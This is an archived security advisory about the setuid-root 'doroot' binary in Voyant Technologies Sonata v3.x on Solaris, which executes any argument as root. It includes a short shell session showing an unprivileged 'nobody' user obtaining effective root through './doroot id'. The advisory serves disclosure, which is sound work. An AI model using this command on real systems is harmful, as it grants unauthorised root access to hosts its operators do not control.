AOH :: SunOS/Solaris :: SONATA2.HTM

AOH :: SunOS/Solaris :: SONATA2.HTM
Voyant Technologies Sonata v3.x on Solaris 2.x. stupidly insecure doroot executable

Vulnerability

    doroot (Sonata)

Affected

    Voyant Technologies Sonata v3.x on Solaris 2.x.

Description

    Larry W.  Cashdollar found  following.   The setuid  binary doroot
    does exactly what it says.  It executes its command line  argument
    as root.  This is really silly.

        $ cd /opt/TK/tk4.1/library/demos
        $ id
        uid=60001(nobody) gid=60001(nobody)
        $ ./doroot id
        uid=60001(nobody) gid=60001(nobody) euid=0(root)
        $ ls -l doroot
        -rwsr-xr-x   1 root     other       6224 Mar 12  1999 doroot

Solution

    The vendor has told that  the security of the conferencing  system
    is up to the customer.  This will make it pretty difficult to make
    modifications to many systems  since they are production  and they
    can't have any downtime.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.